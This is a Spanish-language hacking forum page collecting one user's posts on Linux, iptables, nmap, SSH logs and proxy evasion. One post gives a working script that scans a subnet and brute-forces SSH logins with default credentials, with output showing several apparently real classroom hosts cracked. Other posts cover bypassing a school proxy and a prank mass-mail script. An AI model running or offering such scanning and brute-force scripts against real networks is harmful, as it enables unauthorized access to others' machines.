Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - risto

#1
Seguridad / Volverme invisible a la red local
25 Junio 2012, 06:32 AM
Hola buenos días!, mirad quería ser completamente invisible a los pcs que hay en mi red local.
Pensé que sería fácil! simplemente un drop a todos los pcs que me llamen desde la red local:
iptables -A INPUT -s 192.168.1.0/24 -j DROP

Con este comando consigo evitar los pings y bueno pues cualquier conexión hacia a mi pc desde la red local, pero si desde otro pc de mi red local hago un nmap -sP 192.168.1.* si me detecta este pc como host up.
Alguien sabría explicarme porque me detecta mi pc si he bloqueado todas las conexiones entrantes? La verdad me interesa mas el "porque me lo detecta" que el "como hacerlo indetectable" ya que el porque me llevará al como.

Gracias de antemano cracks!

#2
Creo que sobran palabras mostrando esto:

root@bt:~/Escritorio# ./script.sh |grep FOUND
ACCOUNT FOUND: [ssh] Host: 192.168.2.123 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.145 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.207 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.21 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.214 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.234 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.239 User: administrador Password: administrador [SUCCESS
ACCOUNT FOUND: [ssh] Host: 192.168.2.240 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.243 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.244 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.30 User: alumne Password: alumne [SUCCESS]
root@bt:~/Escritorio#


y aquí está lo que todos esperabais. Nada del otro mundo...
#!/bin/bash
ipRange=$(ifconfig | grep -A 1 -e eth -e wlan | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -m 1 -e'([0-9]{1,3}+\.){2}[0-9]{1,3}')
ipNmap=$(echo $ipRange'.*')
nmap -p 22 -open $ipNmap | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | uniq > /tmp/ip.txt
echo "alumne" > /tmp/Usuarios.txt
echo "administrador" >> /tmp/Usuarios.txt
echo "root" >> /tmp/Usuarios.txt
echo "alumne" > /tmp/Passwords.txt
echo "administrador" >> /tmp/Passwords.txt

ips=$(cat /tmp/ip.txt | sort)

for ip in $ips
do
    medusa -h $ip -U /tmp/Usuarios.txt -P /tmp/Passwords.txt -M ssh -L -f -b -v 6
done


#3
Hola! Mirad estoy haciendo un proyecto por puro aburrimiento y por hobby o como querais decirlo. La cuestión es que estaba una noche mirando la tele y apareció un programa de esos que sale una tabla de 6x6 o lo que sea y te piden que saques el nombre de 7 animales por ejemplo.  Bueno pues me iluminé jajaj pensé voy a hacer un programa que me saque las palabras en español de esa tabla.

Me dije a mi mismo que necesitaba C por su velocidad aunque estoy bastante perdido, hacía mucho que no programaba en C. Una vez con el diccionario en español(al cual todavia tengo que quitarle caracteres especiales) ice la parte del programa en el que se comparan una lista de palabras con el diccionario(me costó lo suyo ya que lo hago caracter a caracter y no con strings). Perfecto, ahora solo necesito sacar la lista de palabras de la tabla, y aquí es donde tengo el problema. Atentos por favor:

Esta es la representación de la tabla en el array:

x a g h j
h d h w i
s h j q g
a j j r w
a g h k r

Bien pues me gustaria genererar palabras apartir de este array bidimensional y quedaría así en plan sopa de letras:
xa
xag
xagh
xaghj
ag
agh
aghj
gh
ghj
hj
...
Bueno estas serian las palabras de lo que seria la primera linea horizontal de izquierda a derecha, estoy bastante atascado, es mas difícil de lo que pensé en un principio sacar estas combinaciones, me conformo con sacar las horizontales de izquierda a derecha y de arriba abajo.

Una mano porfavor no quisiera dejar el programa a medias :(

Ahora estoy en el curro haciendo practicas :( despues cuando llegue a casa subo el codigo a ver si así os motiváis mas :P (aunque me da verguenza enseñar esa chapucilla XD)

A por cierto, lo mismo que tengo hecho en C osea la comparación de una lista de palabras con otra(el dic) también la hice en script bash, por probar y porque era un momento, mi experiencia ha sido gratificante ya que comparar el diccionario 10 veces por ejemplo tarda unos 5 segundos mientras que en C es instantáneo.

PD: No pido el programa hecho, solo necesito una mano con el algoritmo a utilizar.
#4
GNU/Linux / Aplicaciones al inicio por consola
6 Febrero 2012, 11:02 AM
Necesito iniciar mi x11vnc(servidor vnc) al inicio de Linux(Ubuntu) pero tengo un problema:

He intentado ejecutarlo por medio de runlevels, pero no puedo porque cuando se ejecuta todavia no se ha iniciado el escritorio y claro, no funciona.

La única forma de ejecutarlo al inicio es con las famosas aplicaciones al inicio del entorno gráfico, encontradas en /sistema/preferencias/aplicaciones al inicio.

Bien, pues mi pregunta es, como hago para configurar esas aplicaciones al inicio desde consola, o mediante un script?
#5
GNU/Linux / duda direccionamiento > >> < <<
24 Enero 2012, 10:40 AM
Tengo claro la utilización de > y >> en linea de comandos linux, es para sobreescribir o para añadir a, en principio un archivo.

Bien, entonces < << es si no me equivoco lo mismo pero al revés...

Vale pues mi duda viene al ver este comando:
mailx -s "{EL SUBJECT QUE QUIERAS}" $i <<!

La parte en negrita no se exactamente que hace, redirecciona la exclamación al comando? no sé, si alguien sabe que hace podria hecharme una mano?
Dejo aquí el código completo del script... por si os ayuda.

for i in 'cat /tmp/direcciones.txt' ; do
mailx -s "{EL SUBJECT QUE QUIERAS}" [b]$i <<![/b]
'cat /tmp/contenido.txt'
!


Al final hay otra exclamación y supongo que tendrá que ver con la anterior, no caigo en la utilidad que tiene...

Por otro lado no hagais caso de la lamerada de script que es, solo quería hecharme unas risas con los compañeros de clase y modificar el script para hacerlo mejor.

No estará de mas poner la web de donde he sacado este script (por respeto a quien le copié el script):
http://www.lawebdelprogramador.com/foros/Linux_Programacion/695287-script_para_enviar_correo_masivo.html
#6
Hacking / Buscar windows con nmap
22 Enero 2012, 04:25 AM
Este comando sirve para mostrar solamente las ips y las macs de los pc con windows:
nmap -O 192.168.0.* | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' -e '([0-9A-F]{2}:){5}[0-9A-F]{2}' -e windows | uniq | grep -i -B 2 windows | grep -i -v windows


Me parece útil para buscar windows en redes con muchos pcs, ya que si no lo filtramos, el resultado es muy engorroso.
#7
Hacking / en serio, me están hackeando... XD
5 Enero 2012, 20:04 PM
Os cuento, estaba yo con un colega y me preguntó por como mirar los logs en linux para saber si te han entrado en la pc, y le digo, pues tienes que filtrarlos con el grep, y al mostrarselo... me quedé a rayas, os dejo unas partes del /var/log/auth.log de mi servidor:

Primero diré que el servidor no es mas que un portátil viejo que sirve ssh, LAMP, y bueno todo tipo, ya que estudio informática y pues siempre hago mis pruebas(de ahí que tenga tantos fallos de seguridad XD). Los puertos están redireccionados desde el router al pc, así accediendo al ssh de mi ip pública accederíamos al servidor ssh de mi portátil.
Comando utilizado para ver los logs: cat /var/log/auth.log | grep from

Estas són las últimas lineas que tengo, y el que ha accedido he sido yo localmente como se puede ver pero esa ip(46.72.53.180) os aseguro que no he sido yo:

Jan  5 18:02:53 dani-Aspire-5720 sshd[21367]: Failed password for root from 46.72.53.180 port 38572 ssh2
Jan  5 18:03:00 dani-Aspire-5720 sshd[21369]: Failed password for root from 46.72.53.180 port 38893 ssh2
Jan  5 18:03:09 dani-Aspire-5720 sshd[21371]: Failed password for root from 46.72.53.180 port 39195 ssh2
Jan  5 18:03:17 dani-Aspire-5720 sshd[21378]: Failed password for root from 46.72.53.180 port 39521 ssh2
Jan  5 18:03:25 dani-Aspire-5720 sshd[21380]: Failed password for root from 46.72.53.180 port 39863 ssh2
Jan  5 18:03:33 dani-Aspire-5720 sshd[21382]: Failed password for root from 46.72.53.180 port 40187 ssh2
Jan  5 18:03:42 dani-Aspire-5720 sshd[21384]: Failed password for root from 46.72.53.180 port 40508 ssh2
Jan  5 18:03:50 dani-Aspire-5720 sshd[21386]: Failed password for root from 46.72.53.180 port 40850 ssh2
Jan  5 18:03:58 dani-Aspire-5720 sshd[21388]: Failed password for root from 46.72.53.180 port 41198 ssh2
Jan  5 18:04:06 dani-Aspire-5720 sshd[21390]: Failed password for root from 46.72.53.180 port 41545 ssh2
Jan  5 18:04:15 dani-Aspire-5720 sshd[21397]: Failed password for root from 46.72.53.180 port 41935 ssh2
Jan  5 18:04:22 dani-Aspire-5720 sshd[21399]: Failed password for root from 46.72.53.180 port 42381 ssh2
Jan  5 18:04:31 dani-Aspire-5720 sshd[21401]: Failed password for root from 46.72.53.180 port 42822 ssh2
Jan  5 18:58:34 dani-Aspire-5720 sshd[21720]: Failed password for dani from 192.168.0.69 port 34017 ssh2
Jan  5 18:58:37 dani-Aspire-5720 sshd[21720]: Accepted password for dani from 192.168.0.69 port 34017 ssh2
Jan  5 19:01:07 dani-Aspire-5720 sshd[21907]: Received disconnect from 192.168.0.69: 11: disconnected by user
Jan  5 19:01:21 dani-Aspire-5720 sshd[22060]: Accepted password for root from 192.168.0.69 port 34018 ssh2


Aqui las primeras veces que me atacaba XDXDXD es patético, 1 mes, dia a dia intentando entrar en mi pc :

Dec  7 16:07:44 dani-Aspire-5720 sshd[21465]: Failed password for invalid user motorola from 189.111.206.136 port 38218 ssh2
Dec  7 16:07:47 dani-Aspire-5720 sshd[21467]: Invalid user motorola from 189.111.206.136
Dec  7 16:07:49 dani-Aspire-5720 sshd[21467]: Failed password for invalid user motorola from 189.111.206.136 port 39840 ssh2
Dec  7 16:07:52 dani-Aspire-5720 sshd[21469]: Invalid user aaron from 189.111.206.136
Dec  7 16:07:55 dani-Aspire-5720 sshd[21469]: Failed password for invalid user aaron from 189.111.206.136 port 40665 ssh2
Dec  7 16:07:57 dani-Aspire-5720 sshd[21471]: Invalid user abacus from 189.111.206.136
Dec  7 16:08:00 dani-Aspire-5720 sshd[21471]: Failed password for invalid user abacus from 189.111.206.136 port 41522 ssh2
Dec  7 16:08:03 dani-Aspire-5720 sshd[21473]: Invalid user abby from 189.111.206.136
Dec  7 16:08:05 dani-Aspire-5720 sshd[21473]: Failed password for invalid user abby from 189.111.206.136 port 43076 ssh2
Dec  7 16:08:08 dani-Aspire-5720 sshd[21475]: Invalid user abbycheng from 189.111.206.136
Dec  7 16:08:11 dani-Aspire-5720 sshd[21475]: Failed password for invalid user abbycheng from 189.111.206.136 port 43900 ssh2
Dec  7 16:08:13 dani-Aspire-5720 sshd[21477]: Invalid user abc from 189.111.206.136
Dec  7 16:08:16 dani-Aspire-5720 sshd[21477]: Failed password for invalid user abc from 189.111.206.136 port 44766 ssh2
Dec  7 16:08:19 dani-Aspire-5720 sshd[21479]: Invalid user abe from 189.111.206.136
Dec  7 16:08:20 dani-Aspire-5720 sshd[21479]: Failed password for invalid user abe from 189.111.206.136 port 46317 ssh2
Dec  7 16:08:23 dani-Aspire-5720 sshd[21481]: Invalid user abhinav from 189.111.206.136
Dec  7 16:08:26 dani-Aspire-5720 sshd[21481]: Failed password for invalid user abhinav from 189.111.206.136 port 47146 ssh2
Dec  7 16:08:29 dani-Aspire-5720 sshd[21483]: Invalid user abhinavgalav from 189.111.206.136


Parece que finalmente le pilló el truco y solo probaba con usuario root(si, lo tengo abierto  ;-)) pero sin mucho éxito, también vemos que cada día utiliza una ip diferente:

Jan  2 16:52:50 dani-Aspire-5720 sshd[25038]: Failed password for root from 174.139.74.114 port 45498 ssh2
Jan  2 16:52:54 dani-Aspire-5720 sshd[25040]: Failed password for root from 174.139.74.114 port 45814 ssh2
Jan  2 16:52:58 dani-Aspire-5720 sshd[25042]: Failed password for root from 174.139.74.114 port 46154 ssh2
Jan  2 16:53:02 dani-Aspire-5720 sshd[25044]: Failed password for root from 174.139.74.114 port 46523 ssh2

Jan  3 00:40:50 dani-Aspire-5720 sshd[27786]: Failed password for root from 182.48.42.63 port 48164 ssh2
Jan  3 00:40:56 dani-Aspire-5720 sshd[27788]: Failed password for root from 182.48.42.63 port 48519 ssh2
Jan  3 00:41:01 dani-Aspire-5720 sshd[27790]: Failed password for root from 182.48.42.63 port 48893 ssh2
Jan  3 00:41:05 dani-Aspire-5720 sshd[27797]: Failed password for root from 182.48.42.63 port 49261 ssh2
Jan  3 00:41:09 dani-Aspire-5720 sshd[27799]: Failed password for root from 182.48.42.63 port 49614 ssh2
Jan  3 00:41:15 dani-Aspire-5720 sshd[27801]: Failed password for root from 182.48.42.63 port 49946 ssh2


Alguna vez me sale esto (he cogido tres lineas aleatorias) que indica que está usando proxy, realmente esto esto es lo que mas me sorprende de este lammer, que use un proxy:

an  2 10:39:36 dani-Aspire-5720 sshd[22808]: Bad protocol version identification 'GET http://www.hardjob.net/proxyheader.php HTTP/1.1' from 58.218.199.147
Jan  1 11:10:12 dani-Aspire-5720 sshd[14300]: Bad protocol version identification 'GET http://financeande.com/feed/feed.php HTTP/1.1' from 58.218.199.147
Dec 11 00:25:44 dani-Aspire-5720 sshd[31775]: Bad protocol version identification 'GET http://www.travelimgusa.com/ip.php HTTP/1.1' from 58.218.199.147


Supongo que hace falta decir que tengo miles de lineas como estas, desde el día 7 de diciembre hasta hoy día 5 de enero. El muy lammer lleva un mes atacandome y aún no ha entrado.

Ya está, yo me he echado unas risas, además os contaré un secreto, la contraseña de root era root  ;-) patético tanto para mí como para él.
#8
Mirad este año en clase nos pusieron un proxy y bueno, lo primero que pensé para saltármelo fue hacer un túnel ssh hacia mi casa y punto, pero tuve el problema de hacer pasar el ssh por el proxy(fail) y bueno al final descubrí el corkscrew que estaba dedicado para mi caso ya que lo que hacía era pasar el tunel ssh por el proxy. Bien, he logrado que me funcione y además con una velocidad muy buena, y nada aver si consigo comprimir de alguna forma estos datos para conseguir mayor velocidad.

Vale perfecto conseguí saltarme el proxy, pero quiero ir mas allá, quiero saltármelo de otra manera. Me gustaría hacer una pagina web al estilo http://proxyweb.com.es/ pero como funciona esta web? como lo hacen? por php? tor? no se... alguna idea?